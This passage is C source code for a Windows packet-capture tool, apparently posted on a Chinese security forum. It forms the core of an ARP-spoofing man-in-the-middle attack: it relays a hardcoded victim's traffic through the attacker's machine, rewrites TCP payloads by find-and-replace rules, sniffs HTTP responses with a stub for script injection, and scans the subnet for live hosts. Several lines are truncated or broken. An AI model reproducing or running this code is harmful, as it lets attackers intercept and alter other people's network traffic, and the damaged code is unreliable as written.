&&(!(memcmp(pkt_data+6,parpcheatData->myip->mac,6)==0))
&&*(unsigned long *)(pkt_data+30)!=parpcheatData->myip->ip
&&(!(memcmp(pkt_data,bcast,6)==0)))
{
memcpy(sendbuf,pkt_data,pkt_header->caplen);
if(memcmp(pkt_data,parpcheatData->myip->mac,6)&&memcmp(pkt_data+6,mc,6))
{ ether_header *eh = (ether_header*)pkt_data;
if(ntohs(eh->ether_type)==0x0800)
{ // ip packet only
memcpy(sendbuf,togatewaymac,12);
ip_header *ih = (ip_header*)(sendbuf+14);
if(ntohs(ih->proto) == 0x0600)
{ // tcp packet only
ReplacePacket(sendbuf, pkt_header->len);
//ReplacePacket2(sendbuf, pkt_header->len);
int y =0;
}
}
}
if(*(unsigned long *)(pkt_data+30)==inet_addr("192.168.1.115")&&memcmp(pkt_data,parpcheatData->myip->mac,6)&&memcmp(pkt_data+6,parpcheatData->getwip->mac,6))
{
ether_header *eh = (ether_header*)pkt_data;
if(ntohs(eh->ether_type)==0x0800)
{ // ip packet only
ip_header *ih = (ip_header*)(sendbuf+14);
if(ntohs(ih->proto) == 0x0600)
{ // tcp packet only
int ip_len = ntohs(ih->tlen);//ip_len = ip_body + ip_header
bool find_http = false;
// CString http_txt = "";
// bool find_http = false;
string http_txt = "";
size_t ip_header_len = (ih->ver_ihl & 0xf) * 4;
tcp_header* th = (tcp_header *) ((u_char*)ih + ip_header_len);
ip_len=ip_len-ip_header_len;
char* ip_pkt_data = (char*)th;
if (ntohs(th->th_dport)==80||ntohs(th->th_sport)==80)
{
for(int im=0;im<ip_len;++im)
{
// printf("ishttppacket");
char* sr="<script type='text/javascript'>alert('aaa')<scrippt>";
if(!find_http&&(im+strlen("text/html")<ip_len) &&strncmp(ip_pkt_data+im,"text/html",strlen("text/html"))==0)
{
// char* py= strstr(ip_pkt_data,"</head>");
find_http = true;
// memset(sendbuf+20+im,0x80,1600-20-im);
}
if(find_http )
{
http_txt+=ip_pkt_data[im];
}
}
}
if(http_txt != ""){
/* cout<<http_txt;
cout<<endl<<"***********************************************************"<<endl<<endl;*/
}
}
}
if(ntohs(eh->ether_type)==0x0800)
{ // ip packet only
memcpy(cmac->mac,mc,6);
memcpy(cmac->mac+6,parpcheatData->myip->mac,6);
memcpy(sendbuf,cmac,12);
ip_header *ih = (ip_header*)(sendbuf+14);
if(ntohs(ih->proto) == 0x0600)
{ // tcp packet only
/*char cm[6];
memset(cm,0xff,6);
memcpy(cm,pkt_data,6);
printf(" selected:= %.2X-%.2X-%.2X-%.2X-%.2X-%.2X ",cm[0],cm[1],cm[2],cm[3],cm[4],cm[5]);*/
//char * sf=(char *)malloc(500);
////memset(sendbuf+500,0xFF,);
//memset(sf,0xFF,500);
//memcpy(sendbuf+1025,sf,500);
ReplacePacket(sendbuf, pkt_header->len);
//ReplacePacket2(sendbuf, pkt_header->len);
// break;
}
}
}
/* save the packet on the dump file */
pcap_dump((unsigned char *)dumpfile, pkt_header, pkt_data);
pcap_sendpacket(nicHandle,sendbuf,pkt_header->len);
}
}
pcap_dump_close(dumpfile);
return 1;
}
void ReplacePacket(const u_char *pkt_data, unsigned int pkt_len)
{
ether_header *eh;
ip_header *ih;
tcp_header *th;
u_int ip_len;
eh = (ether_header *) pkt_data;
if(eh->ether_type != htons(0x0800))
return; // 只转发IP包
// 找到IP头的位置
ih = (ip_header *) (pkt_data + 14); //14为以太头的长度
// 找到TCP的位置
ip_len = (ih->ver_ihl & 0xf) * 4;
th = (tcp_header *) ((u_char*)ih + ip_len);
// 得到TCP数据包的指针和长度
unsigned char *datatcp = (unsigned char *) ih + sizeof(ip_header)
+ sizeof(struct tcp_header);
int lentcp = ntohs(ih->tlen) - (sizeof(ip_header) + sizeof(tcp_header));
// 开始替换数据内容,重新计算校验和
PSTRLINK pTmp = strLink;
int i = 0;
/*while (pTmp->next)
{*/
// 开始匹配规则进行替换
while (pTmp)
{
if (Replace(datatcp, lentcp, pTmp->szOld, pTmp->szNew))
{
printf(" Applying rul %s ==> %s\n", pTmp->szOld, pTmp->szNew);
i ++;
pTmp = pTmp->next;
}
else
{
pTmp = pTmp->next;
}
}
// pTmp = pTmp->next;
//}
/*if (Replace(datatcp, lentcp, pTmp->szOld, pTmp->szNew))
{
printf(" Applying rul %s ==> %s\n", pTmp->szOld, pTmp->szNew);
i ++;
}*/
if (i>0) // 重新计算校验和
{
if (pkt_len>600)
{
AnalyzePacket(pkt_data,pkt_len);
printf("
ih->crc = 0;
th->th_sum = 0;
ih->crc = checksum((USHORT *)ih,sizeof(ip_header));
ComputeTcpPseudoHeaderChecksum(ih, th, (char *)datatcp, lentcp);
// ReplacePacket2( pkt_data, pkt_len);
}
return;
}
else
{
// printf("
}
void ReplacePacket2(const u_char *pkt_data, unsigned int pkt_len)
{
ether_header *eh;
ip_header *ih;
tcp_header *th;
u_int ip_len;
eh = (ether_header *) pkt_data;
if(eh->ether_type != htons(0x0800))
return; // 只转发IP包
// 找到IP头的位置
ih = (ip_header *) (pkt_data + 14); //14为以太头的长度
// 找到TCP的位置
ip_len = (ih->ver_ihl & 0xf) * 4;
th = (tcp_header *) ((u_char*)ih + ip_len);
// 得到TCP数据包的指针和长度
unsigned char *datatcp = (unsigned char *) ih + sizeof(ip_header)
+ sizeof(struct tcp_header);
int lentcp = ntohs(ih->tlen) - (sizeof(ip_header) + sizeof(tcp_header));
// 开始替换数据内容,重新计算校验和
PSTRLINK pTmp = strLink2;
int i = 0;
/*while (pTmp->next)
{*/
// 开始匹配规则进行替换
//while (pTmp)
//{
// if (Replace(datatcp, lentcp, pTmp->szOld, pTmp->szNew))
// {
// printf(" Applying rul %s ==> %s\n", pTmp->szOld, pTmp->szNew);
// i ++;
// //pTmp = pTmp->next;
// }
//
// pTmp = pTmp->next;
//
//}
if (Replace(datatcp, lentcp, pTmp->szOld, pTmp->szNew))
{
printf(" Applying rul %s ==> %s\n", pTmp->szOld, pTmp->szNew);
i ++;
}
// pTmp = pTmp->next;
//}
if (i>0) // 重新计算校验和
{
AnalyzePacket(pkt_data,pkt_len);
printf("
ih->crc = 0;
th->th_sum = 0;
ih->crc = checksum((USHORT *)ih,sizeof(ip_header));
ComputeTcpPseudoHeaderChecksum(ih, th, (char *)datatcp, lentcp);
return;
}
else
{
// printf("
}
void ComputeTcpPseudoHeaderChecksum(ip_header *pIphdr, tcp_header *pTcphdr,
char *payload, int payloadlen)
{
char *buff = (char *) malloc(1024+payloadlen);
char *ptr=buff;
int chksumlen = 0;
ULONG zero = 0;
// 伪头
// 包含源IP地址和目的IP地址
memcpy(ptr, &pIphdr->ipSource, sizeof(pIphdr->ipSource));
ptr += sizeof(pIphdr->ipSource);
chksumlen += sizeof(pIphdr->ipSource);
memcpy(ptr, &pIphdr->ipDestination, sizeof(pIphdr->ipDestination));
ptr += sizeof(pIphdr->ipDestination);
chksumlen += sizeof(pIphdr->ipDestination);
// 包含8位0域
memcpy(ptr, &zero, 1);
ptr += 1;
chksumlen += 1;
// 协议
memcpy(ptr, &pIphdr->proto, sizeof(pIphdr->proto));
ptr += sizeof(pIphdr->proto);
chksumlen += sizeof(pIphdr->proto);
// TCP长度
USHORT tcp_len = htons(sizeof(tcp_header) + payloadlen);
memcpy(ptr, &tcp_len, sizeof(tcp_len));
ptr += sizeof(tcp_len);
chksumlen += sizeof(tcp_len);
// TCP头
memcpy(ptr, pTcphdr, sizeof(tcp_header));
ptr += sizeof(tcp_header);
chksumlen += sizeof(tcp_header);
// 净荷
memcpy(ptr, payload, payloadlen);
ptr += payloadlen;
chksumlen += payloadlen;
// 补齐到下一个16位边界
for(int i=0; i < payloadlen % 2; i++)
{
*ptr = 0;
ptr ++;
chksumlen ++;
}
// 计算这个校验和,将结果填充到TCP头
pTcphdr->th_sum = checksum((USHORT*) buff, chksumlen);
}
BOOL Replace(const void *in_block, const size_t block_size,
const char *szOld, const char *szNew)
{
size_t shift[256];
bool init = false;
return memreplace(in_block, block_size, szOld, strlen(szOld), szNew,
strlen(szNew), shift, &init);
}
USHORT checksum(USHORT *buffer, int size)
{
unsigned long cksum=0;
while (size >1) {
cksum+=*buffer++;
size-=sizeof(USHORT);
}
if (size) cksum += *(UCHAR*) buffer;
cksum = (cksum >> 16) + (cksum&0xffff);
cksum += (cksum >> 16);
return (USHORT) (~cksum);
}
int memreplace(const void *in_block, /* 数据块 */
const size_t block_size, /* 数据块长度 */
const void *in_pattern, /* 需要查找的数据 */
const size_t pattern_size, /* 查找数据的长度 */
const void *in_newpattern, /* 要替换的新数据 */
const size_t newpattern_size, /* 要替换的新数据的长度 */
size_t * shift, /* 移位表,应该是256*size_t的数组 */
bool * init)
{ /* 是否需要初始化移位表 */
size_t byte_nbr, /* Distance through block */
match_size, /* Size of matched part */
limit;
const unsigned char *match_ptr = NULL;
const unsigned char *block = (unsigned char *) in_block, /* Concrete pointer to block data */
*pattern = (unsigned char *) in_pattern; /* Concrete pointer to search value */
if (block == NULL || pattern == NULL || shift == NULL)
return (NULL);
/* 查找的串长应该小于 数据长度*/
if (block_size < pattern_size)
return 0;
if (pattern_size == 0) /* 空串匹配第一个 */
{
memcpy((void *) (block), in_newpattern, newpattern_size); // 找到并开始替换
return 1;
}
/* 如果没有初始化,构造移位表*/
if (!init || !*init) {
for (byte_nbr = 0; byte_nbr < 256; byte_nbr++)
shift[byte_nbr] = pattern_size + 1;
for (byte_nbr = 0; byte_nbr < pattern_size; byte_nbr++)
shift[(unsigned char) pattern[byte_nbr]] = pattern_size - byte_nbr;
if (init)
*init = true;
}
/* 开始搜索数据块,每次前进移位表中的数量 */
limit = block_size - pattern_size + 1;
for (byte_nbr = 0; byte_nbr < limit; byte_nbr += shift[block[byte_nbr + pattern_size]]) {
if (block[byte_nbr] == *pattern) {
/*
* 如果第一个字节匹配,那么继续匹配剩下的
*/
match_ptr = block + byte_nbr + 1;
match_size = 1;
do {
if (match_size == pattern_size)
{
/* 找到并开始替换 */
memcpy((void *) (block + byte_nbr), in_newpattern, newpattern_size);
return 1;
}
} while (*match_ptr++ == pattern[match_size++]);
}
}
return 0;
}
unsigned int _stdcall SendPacketToGetAllActtiveIP_MAC(void *para)
{
unsigned long tip,subnetsta,subnetend;
static unsigned char sendbuf[60];
ethernet_head eth;
arp_head arp;
IP_MAC *myip = (IP_MAC*)para;
subnetsta=htonl(myip->ip&netmask); //计算内网ip起点
subnetend=htonl(htonl(subnetsta)|(~netmask)); //计算内网ip结束
memset(eth.dest_mac,0xFF,6);
memcpy(eth.source_mac,myip->mac, 6);
memcpy(arp.sour_addr,myip->mac, 6);
memset(arp.dest_addr,0, 6);
eth.eh_type=htons(0x0806);
arp.hardware_type=htons(0x0001);
arp.protocol_type=htons(0x0800);
arp.add_len=6;
arp.pro_len=4;
arp.option=htons(0x0001);
arp.sour_ip=myip->ip;
memset(arp.padding,0,18);
memset(sendbuf,0,sizeof(sendbuf));
memcpy(sendbuf,ð,sizeof(eth));
for(tip=subnetsta;tip<=subnetend-1;tip++)
{
arp.dest_ip=htonl(tip);
if(arp.dest_ip == myip->ip)
continue;
memcpy(sendbuf+sizeof(eth),&arp,sizeof(arp));
if(pcap_sendpacket(nicHandle,sendbuf,60)!=0)
{
printf("Getallactive ip PacketSendPacket in getmine Error: %d\n",GetLastError());
return 0;
}
}
//memset(sendbuf,0,sizeof(sendbuf));
// free(sendbuf);
return 1;
}
unsigned int _stdcall ReceivePacketToGetAllActtiveIP_MAC(void *para)
{
struct pcap_pkthdr * pkt_header;
u_char * pkt_data;
pActtiveIP_MAC p,q;
q=new ActtiveIP_MAC;
memset(q, 0, sizeof(ActtiveIP_MAC));
int i;
IP_MAC myip = *(IP_MAC*)para;
while((pcap_next_ex(nicHandle,&pkt_header,(const u_char**)&pkt_data))>0)
{
//(u_long*)(pkt_data+38)==(u_long*)inet_addr("192.168.1.117"
if(*(unsigned short *)(pkt_data+12)==htons(0x0806)&&*(unsigned short *)(pkt_data+14)==htons(0x0001))
{
// arp_head *pd= (arp_head*)pkt_data;
p=new ActtiveIP_MAC;
memset(p, 0, sizeof(ActtiveIP_MAC));
p->next=NULL;
p->IP_MAC.ip=*(unsigned long*)(pkt_data+28);
for(i=0;i<6;i++)
{
p->IP_MAC.mac[i]=*(unsigned char*)(pkt_data+22+i);
}
if(pIP_MACHead==NULL)
{
pIP_MACHead=p;
q=p;
}
else
{
q->next=p;
q=p;
}
}
if(StopReceivePacket==1)
{
return 1;
}
}
return 1;
}
[培训]《安卓高级研修班(网课)》月薪三万计划,掌握调试、分析还原ollvm、vmp的方法,定制art虚拟机自动化脱壳的方法
赞赏
他的文章
看原图
赞赏
雪币:
留言: